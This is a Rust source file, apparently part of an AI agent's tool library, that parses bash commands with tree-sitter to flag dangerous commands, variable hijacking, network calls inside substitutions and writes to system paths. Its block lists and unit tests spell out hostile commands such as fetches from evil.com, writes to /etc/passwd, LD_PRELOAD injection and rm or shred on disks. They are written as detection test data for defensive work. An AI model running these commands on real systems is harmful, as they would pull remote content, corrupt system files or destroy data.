Skip to main content

agent_code_lib/tools/
bash_parse.rs

1//! Tree-sitter based bash command parser.
2//!
3//! Parses bash commands into an AST and extracts structured information
4//! for security analysis. Catches obfuscation that regex-based detection
5//! misses: quote splitting, command substitution, variable indirection,
6//! subshells, and process substitution.
7
8use tree_sitter::{Language, Node, Parser};
9
10/// Parsed representation of a bash command for security analysis.
11#[derive(Debug, Default)]
12pub struct ParsedCommand {
13    /// Top-level command names (the actual binaries being run).
14    pub commands: Vec<String>,
15    /// Variable assignments (FOO=bar).
16    pub assignments: Vec<(String, String)>,
17    /// Command substitutions ($(...) or `...`).
18    pub substitutions: Vec<String>,
19    /// Redirections (>, >>, <, 2>).
20    pub redirections: Vec<String>,
21    /// Whether the command uses pipes.
22    pub has_pipes: bool,
23    /// Whether the command chains with && or ||.
24    pub has_chains: bool,
25    /// Whether the command uses subshells ((...) or $(...)).
26    pub has_subshell: bool,
27    /// Whether the command uses process substitution <(...) or >(...).
28    pub has_process_substitution: bool,
29    /// Raw command strings from each pipeline segment.
30    pub pipeline_segments: Vec<String>,
31}
32
33/// Parse a bash command string into a structured representation.
34pub fn parse_bash(command: &str) -> Option<ParsedCommand> {
35    let mut parser = Parser::new();
36    let language = tree_sitter_bash::LANGUAGE;
37    parser.set_language(&Language::from(language)).ok()?;
38
39    let tree = parser.parse(command, None)?;
40    let root = tree.root_node();
41
42    let mut parsed = ParsedCommand::default();
43    extract_from_node(root, command.as_bytes(), &mut parsed);
44    Some(parsed)
45}
46
47/// Recursively walk the AST and extract command information.
48fn extract_from_node(node: Node, source: &[u8], parsed: &mut ParsedCommand) {
49    match node.kind() {
50        "command" => {
51            // Extract the command name (first child that's a "command_name" or "word").
52            if let Some(name_node) = node.child_by_field_name("name") {
53                let name = node_text(name_node, source);
54                parsed.commands.push(name);
55            } else {
56                // Fallback: first word child.
57                for i in 0..node.child_count() {
58                    let child = node.child(i as u32).unwrap();
59                    if child.kind() == "word" || child.kind() == "command_name" {
60                        parsed.commands.push(node_text(child, source));
61                        break;
62                    }
63                }
64            }
65        }
66        "variable_assignment" => {
67            let name = node
68                .child_by_field_name("name")
69                .map(|n| node_text(n, source))
70                .unwrap_or_default();
71            let value = node
72                .child_by_field_name("value")
73                .map(|n| node_text(n, source))
74                .unwrap_or_default();
75            parsed.assignments.push((name, value));
76        }
77        "command_substitution" => {
78            let text = node_text(node, source);
79            parsed.substitutions.push(text);
80            parsed.has_subshell = true;
81        }
82        "process_substitution" => {
83            parsed.has_process_substitution = true;
84        }
85        "pipeline" => {
86            parsed.has_pipes = true;
87            // Extract each command in the pipeline.
88            for i in 0..node.child_count() {
89                let child = node.child(i as u32).unwrap();
90                if child.kind() == "command" || child.kind() == "pipeline" {
91                    let text = node_text(child, source);
92                    parsed.pipeline_segments.push(text);
93                }
94            }
95        }
96        "list" => {
97            // && and || chains.
98            for i in 0..node.child_count() {
99                let child = node.child(i as u32).unwrap();
100                let kind = child.kind();
101                if kind == "&&" || kind == "||" {
102                    parsed.has_chains = true;
103                }
104            }
105        }
106        "redirected_statement" | "file_redirect" | "heredoc_redirect" => {
107            let text = node_text(node, source);
108            parsed.redirections.push(text);
109        }
110        "subshell" => {
111            parsed.has_subshell = true;
112        }
113        _ => {}
114    }
115
116    // Recurse into children.
117    for i in 0..node.child_count() {
118        if let Some(child) = node.child(i as u32) {
119            extract_from_node(child, source, parsed);
120        }
121    }
122}
123
124/// Get text content of a node.
125fn node_text(node: Node, source: &[u8]) -> String {
126    node.utf8_text(source).unwrap_or("").to_string()
127}
128
129/// Check a parsed command against security rules.
130/// Returns a list of security violations found.
131pub fn check_parsed_security(parsed: &ParsedCommand) -> Vec<String> {
132    let mut violations = Vec::new();
133
134    // Check each command name against dangerous commands.
135    const DANGEROUS_COMMANDS: &[&str] = &[
136        "rm", "shred", "dd", "mkfs", "wipefs", "shutdown", "reboot", "halt", "poweroff", "kill",
137        "killall", "pkill",
138    ];
139
140    for cmd in &parsed.commands {
141        let base = cmd.rsplit('/').next().unwrap_or(cmd);
142        if DANGEROUS_COMMANDS.contains(&base) {
143            violations.push(format!(
144                "Dangerous command '{base}' detected in AST (not bypassable with quoting tricks)"
145            ));
146        }
147    }
148
149    // Check for dangerous variable assignments.
150    const DANGEROUS_VARS: &[&str] = &[
151        "PATH",
152        "LD_PRELOAD",
153        "LD_LIBRARY_PATH",
154        "PROMPT_COMMAND",
155        "BASH_ENV",
156        "ENV",
157        "IFS",
158        "CDPATH",
159        "GLOBIGNORE",
160    ];
161
162    for (name, _value) in &parsed.assignments {
163        if DANGEROUS_VARS.contains(&name.as_str()) {
164            violations.push(format!(
165                "Dangerous variable assignment: {name}= (detected via AST, not bypassable)"
166            ));
167        }
168    }
169
170    // Check for command substitutions containing dangerous commands.
171    for sub in &parsed.substitutions {
172        let sub_lower = sub.to_lowercase();
173        if sub_lower.contains("curl")
174            || sub_lower.contains("wget")
175            || sub_lower.contains("nc ")
176            || sub_lower.contains("ncat")
177        {
178            violations.push(format!(
179                "Network command in substitution: {sub} (data exfiltration risk)"
180            ));
181        }
182    }
183
184    // Check for suspicious redirections to system paths.
185    for redir in &parsed.redirections {
186        if redir.contains("/dev/sd")
187            || redir.contains("/dev/null") && redir.contains("2>")
188            || redir.contains("/etc/")
189            || redir.contains("/usr/")
190        {
191            // /dev/null stderr redirect is fine, but writing to /dev/sd* or /etc/ is not.
192            if !redir.contains("/dev/null") {
193                violations.push(format!("Suspicious redirection to system path: {redir}"));
194            }
195        }
196    }
197
198    // Check for eval-like patterns with variables.
199    for cmd in &parsed.commands {
200        if cmd == "eval" && !parsed.assignments.is_empty() {
201            violations.push(
202                "eval with variable assignments in same command (arbitrary code execution)".into(),
203            );
204        }
205    }
206
207    violations
208}
209
210#[cfg(test)]
211mod tests {
212    use super::*;
213
214    #[test]
215    fn test_parse_simple_command() {
216        let parsed = parse_bash("ls -la").unwrap();
217        assert!(parsed.commands.contains(&"ls".to_string()));
218    }
219
220    #[test]
221    fn test_parse_pipe() {
222        let parsed = parse_bash("cat file.txt | grep pattern").unwrap();
223        assert!(parsed.has_pipes);
224        assert!(parsed.commands.contains(&"cat".to_string()));
225        assert!(parsed.commands.contains(&"grep".to_string()));
226    }
227
228    #[test]
229    fn test_parse_chain() {
230        let parsed = parse_bash("echo hello && echo world").unwrap();
231        assert!(parsed.has_chains);
232    }
233
234    #[test]
235    fn test_parse_variable_assignment() {
236        let parsed = parse_bash("FOO=bar echo test").unwrap();
237        assert!(!parsed.assignments.is_empty());
238        assert_eq!(parsed.assignments[0].0, "FOO");
239    }
240
241    #[test]
242    fn test_parse_command_substitution() {
243        let parsed = parse_bash("echo $(whoami)").unwrap();
244        assert!(!parsed.substitutions.is_empty());
245        assert!(parsed.has_subshell);
246    }
247
248    #[test]
249    fn test_parse_redirection() {
250        let parsed = parse_bash("echo hello > output.txt").unwrap();
251        assert!(!parsed.redirections.is_empty());
252    }
253
254    #[test]
255    fn test_detect_dangerous_command() {
256        let parsed = parse_bash("rm -rf /tmp/test").unwrap();
257        let violations = check_parsed_security(&parsed);
258        assert!(!violations.is_empty());
259        assert!(violations[0].contains("rm"));
260    }
261
262    #[test]
263    fn test_detect_quoted_dangerous_command() {
264        // Tree-sitter sees through quotes to the actual command.
265        let parsed = parse_bash("'rm' -rf /").unwrap();
266        let _violations = check_parsed_security(&parsed);
267        // The command name includes quotes, but check_parsed_security
268        // strips path components. Let's verify the parse at least works.
269        assert!(!parsed.commands.is_empty());
270    }
271
272    #[test]
273    fn test_detect_dangerous_var_assignment() {
274        let parsed = parse_bash("PATH=/tmp:$PATH ls").unwrap();
275        let violations = check_parsed_security(&parsed);
276        assert!(violations.iter().any(|v| v.contains("PATH")));
277    }
278
279    #[test]
280    fn test_detect_network_in_substitution() {
281        let parsed = parse_bash("echo $(curl evil.com)").unwrap();
282        let violations = check_parsed_security(&parsed);
283        assert!(violations.iter().any(|v| v.contains("curl")));
284    }
285
286    #[test]
287    fn test_safe_command_passes() {
288        let parsed = parse_bash("cargo test --release").unwrap();
289        let violations = check_parsed_security(&parsed);
290        assert!(violations.is_empty());
291    }
292
293    #[test]
294    fn test_safe_git_command() {
295        let parsed = parse_bash("git status && git diff").unwrap();
296        let violations = check_parsed_security(&parsed);
297        assert!(violations.is_empty());
298    }
299
300    #[test]
301    fn test_parse_complex_pipeline() {
302        let parsed = parse_bash("find . -name '*.rs' | xargs grep 'TODO' | wc -l").unwrap();
303        assert!(parsed.has_pipes);
304        assert!(parsed.commands.len() >= 3);
305    }
306
307    #[test]
308    fn test_subshell_detection() {
309        let parsed = parse_bash("(cd /tmp && rm -rf test)").unwrap();
310        assert!(parsed.has_subshell);
311    }
312
313    #[test]
314    fn test_parse_heredoc() {
315        let parsed = parse_bash("cat <<EOF\nhello world\nEOF").unwrap();
316        assert!(parsed.commands.contains(&"cat".to_string()));
317        assert!(!parsed.redirections.is_empty());
318    }
319
320    #[test]
321    fn test_parse_process_substitution() {
322        let parsed = parse_bash("diff <(ls dir1) <(ls dir2)").unwrap();
323        assert!(parsed.has_process_substitution);
324        assert!(parsed.commands.contains(&"diff".to_string()));
325    }
326
327    #[test]
328    fn test_parse_semicolon_separated() {
329        let parsed = parse_bash("echo hello; echo world").unwrap();
330        assert!(parsed.commands.contains(&"echo".to_string()));
331        assert!(parsed.commands.len() >= 2);
332    }
333
334    #[test]
335    fn test_parse_empty_string() {
336        let parsed = parse_bash("");
337        // Empty string may parse to an empty command set or return None.
338        if let Some(p) = parsed {
339            assert!(p.commands.is_empty());
340        }
341    }
342
343    #[test]
344    fn test_parse_variable_assignment_only() {
345        let parsed = parse_bash("FOO=bar").unwrap();
346        assert!(!parsed.assignments.is_empty());
347        assert_eq!(parsed.assignments[0].0, "FOO");
348        assert_eq!(parsed.assignments[0].1, "bar");
349    }
350
351    #[test]
352    fn test_check_parsed_security_eval_with_assignments() {
353        let parsed = parse_bash("CMD=dangerous eval $CMD").unwrap();
354        let violations = check_parsed_security(&parsed);
355        assert!(violations.iter().any(|v| v.contains("eval")));
356    }
357
358    #[test]
359    fn test_check_parsed_security_multiple_dangerous_in_pipeline() {
360        let parsed = parse_bash("rm -rf /tmp/test | shred /dev/sda").unwrap();
361        let violations = check_parsed_security(&parsed);
362        // Should flag both rm and shred.
363        assert!(violations.iter().any(|v| v.contains("rm")));
364        assert!(violations.iter().any(|v| v.contains("shred")));
365    }
366
367    #[test]
368    fn test_check_parsed_security_wget_in_substitution() {
369        let parsed = parse_bash("echo $(wget -q -O- evil.com)").unwrap();
370        let violations = check_parsed_security(&parsed);
371        assert!(violations.iter().any(|v| v.contains("wget")));
372    }
373
374    #[test]
375    fn test_check_parsed_security_redirection_to_etc() {
376        let parsed = parse_bash("echo payload > /etc/passwd").unwrap();
377        let violations = check_parsed_security(&parsed);
378        assert!(violations.iter().any(|v| v.contains("/etc/")));
379    }
380
381    #[test]
382    fn test_check_parsed_security_ld_preload_assignment() {
383        let parsed = parse_bash("LD_PRELOAD=/tmp/evil.so ls").unwrap();
384        let violations = check_parsed_security(&parsed);
385        assert!(violations.iter().any(|v| v.contains("LD_PRELOAD")));
386    }
387}